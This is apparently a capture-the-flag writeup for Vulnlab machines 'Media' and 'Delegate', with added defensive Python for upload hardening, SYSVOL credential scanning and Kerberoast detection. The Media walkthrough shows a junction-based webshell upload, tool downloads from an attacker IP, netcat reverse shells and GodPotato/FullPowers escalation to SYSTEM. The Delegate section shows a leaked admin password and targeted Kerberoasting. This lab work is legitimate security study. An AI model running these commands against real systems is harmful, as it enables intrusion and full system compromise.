}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>
</html>                                                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ 

something must be wrong with my impacket-mssqlclient: Encryption required, switching to TLS


vulnlab-media

vulnlab media

a medium Windows machine

Tools used : ntlm_theft , fullpowers.exe , godpotato.exe

First upload a video file, catch the hash with Responder, and crack it with John.

Then SSH into the box.

Examine index.php, and query the registry for the ApacheHTTPServer service for a clue about what to do (note the ObjectName: Apache runs as NT AUTHORITY\Local Service).

PS C:\xampp\htdocs> reg query "HKLM\SYSTEM\CurrentControlSet\services\ApacheHTTPServer"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer
    Type    REG_DWORD    0x10
    Start    REG_DWORD    0x2
    ErrorControl    REG_DWORD    0x1
    ImagePath    REG_EXPAND_SZ    "C:\Xampp\apache\bin\httpd.exe" -k runservice
    DisplayName    REG_SZ    Apache HTTP Server
    DependOnService    REG_MULTI_SZ    Tcpip\0Afd
    ObjectName    REG_SZ    NT AUTHORITY\Local Service
    Description    REG_SZ    Apache/2.4.56 (Win64)
    FailureActions    REG_BINARY    0000000000000000000000000300000014000000010000001400000001000000140000000100000014000000
    RequiredPrivileges    REG_MULTI_SZ    SeChangeNotifyPrivilege\0SeCreateGlobalPrivilege\0SeIncreaseWorkingSetPrivilege\0SeTcbPrivilege\0SeTimeZonePrivilege

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer\Parameters
PS C:\xampp\htdocs> cat index.php                                                                                    
<?php
error_reporting(0);

    // Your PHP code for handling form submission and file upload goes here.
    $uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
        $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
        $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
        $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

        // Create a folder name using the MD5 hash of Firstname + Lastname + Email
        $folderName = md5($firstname . $lastname . $email);

        // Create the full upload directory path
        $targetDir = $uploadDir . $folderName . '/';

        // Ensure the directory exists; create it if not
        if (!file_exists($targetDir)) {
            mkdir($targetDir, 0777, true);
        }

        // Sanitize the filename to remove unsafe characters
        $originalFilename = $_FILES["fileToUpload"]["name"];
        $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);


        // Build the full path to the target file
        $targetFile = $targetDir . $sanitizedFilename;

        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
            echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";
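The cat output above is cut off, but the two lines that matter are already visible: the per-applicant directory is md5(firstname . lastname . email), all three of which come from the form, and the filename filter keeps any extension. That is why a low-privileged local user can pre-create the directory name as a junction and have the next upload land in the webroot. The following is an added example, not code from the page or from the box: it mirrors those two lines in Python, puts a hardened variant next to them (random directory name, extension allow-list, and a check that the target directory really resolves under the upload root), and runs a constructed scenario with a symlink standing in for the Windows junction. The video extension list and the example names are assumptions.

```python
import hashlib
import os
import re
import secrets
import tempfile

# Assumed allow-list for the "send us your video" form; index.php has no such check
VIDEO_EXTENSIONS = {".mp4", ".mkv", ".mov", ".avi", ".webm"}


def folder_name_as_deployed(firstname: str, lastname: str, email: str) -> str:
    """Mirror of index.php: directory = md5(firstname . lastname . email).

    All three inputs are caller-controlled, so whoever submits the form
    knows the directory name before the upload happens.
    """
    return hashlib.md5((firstname + lastname + email).encode("utf-8")).hexdigest()


def sanitize_as_deployed(filename: str) -> str:
    """Mirror of index.php: strip everything but [a-zA-Z0-9._]; no extension check."""
    return re.sub(r"[^a-zA-Z0-9._]", "", filename)


def hardened_folder_name() -> str:
    """Unpredictable per-upload directory: 128 random bits instead of a hash of form fields."""
    return secrets.token_hex(16)


def hardened_filename(filename: str):
    """Base name only, same character filter, and the extension must be a video type."""
    base = re.sub(r"[^a-zA-Z0-9._]", "", os.path.basename(filename))
    root, ext = os.path.splitext(base)
    if not root or ext.lower() not in VIDEO_EXTENSIONS:
        return None
    return root + ext.lower()


def resolves_inside(base_dir: str, target_dir: str) -> bool:
    """True only if target_dir still lives under base_dir after resolving links.

    os.path.realpath follows symlinks on POSIX and junctions on Windows (3.8+),
    so a directory that was swapped for a junction to the webroot fails here.
    """
    if os.path.islink(target_dir):
        return False
    base = os.path.realpath(base_dir)
    real = os.path.realpath(target_dir)
    try:
        return os.path.commonpath([base, real]) == base
    except ValueError:  # different drives on Windows
        return False


def demo_escape_detection():
    """Constructed scenario: one honest applicant directory, one replaced by a link to the webroot."""
    with tempfile.TemporaryDirectory() as tmp:
        uploads = os.path.join(tmp, "Uploads")
        webroot = os.path.join(tmp, "htdocs")
        os.makedirs(uploads)
        os.makedirs(webroot)
        honest = os.path.join(uploads, folder_name_as_deployed("Jane", "Doe", "jane@example.test"))
        os.makedirs(honest)
        # the predictable name pre-created as a link pointing outside the upload root
        planted = os.path.join(uploads, folder_name_as_deployed("Mal", "Lory", "mal@example.test"))
        os.symlink(webroot, planted, target_is_directory=True)
        return resolves_inside(uploads, honest), resolves_inside(uploads, planted)


if __name__ == "__main__":
    print(folder_name_as_deployed("Jane", "Doe", "jane@example.test"))
    print(sanitize_as_deployed("../../shell.php"), hardened_filename("../../shell.php"))
    print(demo_escape_detection())
```

The realpath check is the part worth copying into the PHP: even with a random directory name, refusing to write through a reparse point closes the junction trick regardless of how the name was chosen.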

 

Make everything ready as below:

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ ssh enox@media.vl
enox@media.vl's password: 

Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

enox@MEDIA C:\Users\enox>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

enox@MEDIA C:\Users\enox>cd cd:\xamp
The filename, directory name, or volume label syntax is incorrect.

enox@MEDIA C:\Users\enox>cd c:\

enox@MEDIA c:\>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\

05/08/2021  01:20 AM    <DIR>          PerfLogs
10/10/2023  06:32 AM    <DIR>          Program Files
05/08/2021  02:40 AM    <DIR>          Program Files (x86)
10/02/2023  10:26 AM    <DIR>          Users
10/10/2023  06:41 AM    <DIR>          Windows
10/02/2023  11:03 AM    <DIR>          xampp
               0 File(s)              0 bytes
               6 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\>cd xampp

enox@MEDIA c:\xampp>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp

10/02/2023  11:03 AM    <DIR>          .
10/02/2023  10:57 AM    <DIR>          apache
06/07/2013  11:15 AM               436 apache_start.bat
10/01/2019  07:13 AM               190 apache_stop.bat
04/05/2021  04:16 PM            10,324 catalina_service.bat
04/05/2021  04:17 PM             3,766 catalina_start.bat
04/05/2021  04:17 PM             3,529 catalina_stop.bat
10/02/2023  10:57 AM    <DIR>          cgi-bin
10/02/2023  10:57 AM    <DIR>          contrib
10/02/2023  10:57 AM    <DIR>          FileZillaFTP
10/02/2023  10:27 AM    <DIR>          htdocs
10/02/2023  10:57 AM    <DIR>          install
10/02/2023  10:57 AM    <DIR>          licenses
10/02/2023  10:57 AM    <DIR>          locale
10/02/2023  10:57 AM    <DIR>          MercuryMail
10/02/2023  10:57 AM    <DIR>          mysql
06/03/2019  11:39 AM               471 mysql_start.bat
10/01/2019  07:13 AM               270 mysql_stop.bat
03/13/2017  11:04 AM               824 passwords.txt
10/02/2023  10:58 AM    <DIR>          perl
10/02/2023  11:01 AM    <DIR>          php
10/02/2023  11:03 AM    <DIR>          phpMyAdmin
04/06/2023  09:04 AM             7,653 readme_de.txt
04/06/2023  09:04 AM             7,515 readme_en.txt
10/02/2023  11:03 AM    <DIR>          sendmail
11/12/2015  05:13 PM               370 setup_xampp.bat
11/29/2020  02:38 PM             1,671 test_php.bat
06/13/2024  06:46 AM    <DIR>          tmp
10/02/2023  11:03 AM    <DIR>          tomcat
10/02/2023  11:03 AM    <DIR>          webalizer
10/02/2023  11:03 AM    <DIR>          webdav
04/06/2021  11:38 AM         3,368,448 xampp-control.exe
04/05/2021  04:08 PM               978 xampp-control.ini
03/30/2013  12:29 PM           118,784 xampp_start.exe
03/30/2013  12:29 PM           118,784 xampp_stop.exe
              16 File(s)      3,644,013 bytes
              19 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\xampp>cd htdocs

enox@MEDIA c:\xampp\htdocs>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp\htdocs

10/02/2023  10:27 AM    <DIR>          .
10/02/2023  11:03 AM    <DIR>          ..
10/02/2023  10:27 AM    <DIR>          assets
10/02/2023  10:27 AM    <DIR>          css
10/10/2023  05:00 AM            20,563 index.php
10/02/2023  10:27 AM    <DIR>          js
               1 File(s)         20,563 bytes
               5 Dir(s)   8,501,620,736 bytes free

enox@MEDIA c:\xampp\htdocs>cd C:\Windows\Tasks\Uploads\

enox@MEDIA C:\Windows\Tasks\Uploads>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads

06/13/2024  06:46 AM    <DIR>          .
10/02/2023  11:04 AM    <DIR>          ..
06/13/2024  06:46 AM    <DIR>          1bad4a5f2408292f03b2bfc5a1edd51d
06/13/2024  06:46 AM                 0 todo.txt
               1 File(s)              0 bytes
               3 Dir(s)   8,501,604,352 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d
The directory is not empty.

enox@MEDIA C:\Windows\Tasks\Uploads>cd 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d

06/13/2024  06:46 AM    <DIR>          .
06/13/2024  06:46 AM    <DIR>          ..
06/13/2024  06:46 AM                37 shell.php
               1 File(s)             37 bytes
               2 Dir(s)   8,499,552,256 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>del *.*
C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d\*.*, Are you sure (Y/N)? y

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>cd ..

enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads>cd C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mklink /J C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d C:\xampp\htdocs
Junction created for C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d <<===>> C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mkdir c:\temp

enox@MEDIA C:\xampp\htdocs>cd c:\temp

enox@MEDIA c:\temp> powershell                                      
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp>  iwr http://10.8.2.138/nc64.exe -outfile nc64.exe
PS C:\temp>  iwr http://10.8.2.138/FullPowers.exe -outfile FullPowers.exe 
PS C:\temp> iwr http://10.8.2.138/GodPotato.exe -outfile gp.exe

Upload shell.php again (with the same name) via the website http://media.vl; because the hash-named directory is now a junction, the file lands in C:\xampp\htdocs.

Trigger the shell:

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ curl http://media.vl/shell.php?cmd=c:\\temp\\nc64.exe+-e+cmd.exe+10.8.2.138+443

.

┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50353
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State   
============================= =================================== ========
SeTcbPrivilege                Act as part of the operating system Disabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled 
SeCreateGlobalPrivilege       Create global objects               Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set      Disabled
SeTimeZonePrivilege           Change the time zone                Disabled


C:\xampp\htdocs>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> ./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
[+] Started dummy thread with id 4104
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
PS C:\temp> 

With another listener running:

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50388
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-87-343222087-845000640-1675840783-1352364494-2876961185                                    Enabled by default, Enabled group, Group owner    
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled


C:\Windows\system32>cd c:\temp 
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp>  .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
 .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140703281709056
[*] DispatchTable: 0x140703284300104
[*] UseProtseqFunction: 0x140703283594576
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\4fd8aaea-891f-4482-ad8b-475ee0150221\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004c02-0f7c-ffff-c191-3eab1219bded
[*] DCOM obj OXID: 0xd4bc6315c97087dc
[*] DCOM obj OID: 0x8e7f990db6fe9b40
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 904 Token:0x740  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5052


And with yet another listener running:

┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50461
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

C:\temp>hostname
hostname
MEDIA

C:\temp>

That’s it

Tools used on this box:

GodPotato

FullPowers

ntlm_theft

 

 

.

 

vulnlab-delegate

vulnlab-delegate

a hard machine

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-lookupsid guest@delegate.vl 10000                   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Brute forcing SIDs at delegate.vl
[*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1484473093-3449528695-2030935120
498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DELEGATE\Administrator (SidTypeUser)
501: DELEGATE\Guest (SidTypeUser)
502: DELEGATE\krbtgt (SidTypeUser)
512: DELEGATE\Domain Admins (SidTypeGroup)
513: DELEGATE\Domain Users (SidTypeGroup)
514: DELEGATE\Domain Guests (SidTypeGroup)
515: DELEGATE\Domain Computers (SidTypeGroup)
516: DELEGATE\Domain Controllers (SidTypeGroup)
517: DELEGATE\Cert Publishers (SidTypeAlias)
518: DELEGATE\Schema Admins (SidTypeGroup)
519: DELEGATE\Enterprise Admins (SidTypeGroup)
520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
525: DELEGATE\Protected Users (SidTypeGroup)
526: DELEGATE\Key Admins (SidTypeGroup)
527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
1000: DELEGATE\DC1$ (SidTypeUser)
1101: DELEGATE\DnsAdmins (SidTypeAlias)
1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
1104: DELEGATE\A.Briggs (SidTypeUser)
1105: DELEGATE\b.Brown (SidTypeUser)
1106: DELEGATE\R.Cooper (SidTypeUser)
1107: DELEGATE\J.Roberts (SidTypeUser)
1108: DELEGATE\N.Thompson (SidTypeUser)
1121: DELEGATE\delegation admins (SidTypeGroup)
                                          

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ smbclient //delegate.vl/SYSVOL -U puck             
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Sep  9 09:52:30 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  delegate.vl                        Dr        0  Sat Aug 26 05:39:25 2023

        5242879 blocks of size 4096. 1960185 blocks available
smb: \> cd delegate.vl\
smb: \delegate.vl\> ls
  .                                   D        0  Sat Aug 26 05:45:45 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  DfsrPrivate                      DHSr        0  Sat Aug 26 05:45:45 2023
  Policies                            D        0  Sat Aug 26 05:39:30 2023
  scripts                             D        0  Sat Aug 26 08:45:24 2023

        5242879 blocks of size 4096. 1960185 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
  .                                   D        0  Sat Aug 26 08:45:24 2023
  ..                                  D        0  Sat Aug 26 05:45:45 2023
  users.bat                           A      159  Sat Aug 26 08:54:29 2023

        5242879 blocks of size 4096. 1960182 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \delegate.vl\scripts\> 


┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cat users.bat 
rem @echo off
net use * /delete /y
net use v: \\dc1\development 

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
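A logon script in SYSVOL is readable by every domain user, so the `/user:Administrator P4ssw0rd1#123` line above is effectively a domain-wide disclosure. The following is an added example, not part of the original writeup: a small scanner that walks script contents and reports credential patterns (net use with an inline password, schtasks /rp, PowerShell plaintext SecureStrings, password assignments) while masking the secret itself in the report. The three sample scripts are constructed for the example and modelled on the users.bat above; the paths and the second and third scripts are not from the box.

```python
import re

# Constructed sample share contents, modelled on the users.bat from the page (not the real share)
SAMPLE_SCRIPTS = {
    r"\\dc1\SYSVOL\delegate.vl\scripts\users.bat": (
        "rem @echo off\n"
        "net use * /delete /y\n"
        "net use v: \\\\dc1\\development\n"
        "\n"
        "if %USERNAME%==A.Briggs net use h: \\\\fileserver\\backups /user:Administrator P4ssw0rd1#123\n"
    ),
    r"\\dc1\SYSVOL\delegate.vl\scripts\mapdrives.bat": (
        "@echo off\n"
        "net use v: \\\\dc1\\development /persistent:no\n"
    ),
    r"\\dc1\SYSVOL\delegate.vl\scripts\backup.ps1": (
        "$sec = ConvertTo-SecureString 'Summer2023!' -AsPlainText -Force\n"
        "$cred = New-Object System.Management.Automation.PSCredential('svc_backup', $sec)\n"
    ),
}

# The last capture group of each rule is the secret material
RULES = [
    ("net use with inline credential",
     re.compile(r"\bnet\s+use\b.*?/user:(\S+)\s+(\S+)", re.I)),
    ("schtasks /rp password",
     re.compile(r"\bschtasks\b.*?/rp\s+(\S+)", re.I)),
    ("plaintext SecureString",
     re.compile(r"ConvertTo-SecureString\s+['\"]([^'\"]+)['\"]\s+-AsPlainText", re.I)),
    ("password assignment",
     re.compile(r"(?:password|passwd|pwd)\s*[:=]\s*['\"]?([^\s'\"]+)", re.I)),
]


def mask(secret: str) -> str:
    """Show that a secret exists without copying it into the report."""
    return secret[:2] + "*" * max(len(secret) - 2, 3)


def scan_script(path: str, text: str):
    """Return one finding per (line, rule) match in a single script."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES:
            m = rx.search(line)
            if m:
                findings.append({"path": path, "line": lineno, "rule": rule,
                                 "secret": mask(m.group(m.lastindex))})
    return findings


def scan_share(scripts: dict):
    """Scan a {path: contents} map, e.g. everything fetched from SYSVOL\\<domain>\\scripts."""
    findings = []
    for path, text in scripts.items():
        findings.extend(scan_script(path, text))
    return findings


if __name__ == "__main__":
    for f in scan_share(SAMPLE_SCRIPTS):
        print(f"{f['path']}:{f['line']}: {f['rule']} ({f['secret']})")
```

Run it against a recursive copy of the Policies and scripts folders; on the box it would have flagged users.bat line 5 before anyone with a Guest session did.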

Run BloodHound to get more info:

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ bloodhound-python -d delegate.vl -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.10.114.169      
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 07S

Uploading the data to BloodHound, we find:

The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user

A targeted kerberoast attack can be performed using targetedKerberoast.py.

targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'
The tool will automatically attempt a targetedKerberoast attack, either on all users or against a specific one if specified in the command line, and then obtain a crackable hash.
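From the blue side, a targeted Kerberoast leaves two correlated traces on the DC: a servicePrincipalName write on a user object (event 5136, if Directory Service Changes auditing is on) followed shortly by a TGS request for that same account with RC4 (event 4769, encryption type 0x17, which is the `krb5tgs$23` format John loads later). The following is an added example and not part of the original writeup: a detector over a handful of constructed events that flags any RC4 TGS request for a user account and escalates it when an SPN was written on that account inside a time window. The event field names are simplified versions of the Security log fields and the timestamps are constructed.

```python
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23

# Constructed events modelled on Security log fields (5136 = directory object modified,
# 4769 = Kerberos service ticket requested); not taken from the box
SAMPLE_EVENTS = [
    {"id": 5136, "time": "2024-06-10T12:30:00", "subject": "A.Briggs",
     "object": "CN=N.Thompson,CN=Users,DC=delegate,DC=vl",
     "attribute": "servicePrincipalName", "operation": "Value Added"},
    {"id": 4769, "time": "2024-06-10T12:30:25", "account": "A.Briggs@DELEGATE.VL",
     "service": "N.Thompson", "etype": 0x17},
    {"id": 4769, "time": "2024-06-10T12:31:00", "account": "A.Briggs@DELEGATE.VL",
     "service": "DC1$", "etype": 0x12},
    {"id": 4769, "time": "2024-06-10T13:45:00", "account": "J.Roberts@DELEGATE.VL",
     "service": "svc_backup", "etype": 0x17},
]


def _cn(dn: str) -> str:
    """'CN=N.Thompson,CN=Users,...' -> 'N.Thompson'."""
    return dn.split(",")[0].split("=", 1)[1]


def detect_targeted_kerberoast(events, window=timedelta(minutes=10)):
    """Flag RC4 TGS requests for user accounts; escalate when an SPN was just written on that account.

    Returns (service account, severity, reason) tuples in time order.
    """
    spn_writes = {}  # account name (lowercase) -> (time, who wrote the SPN)
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
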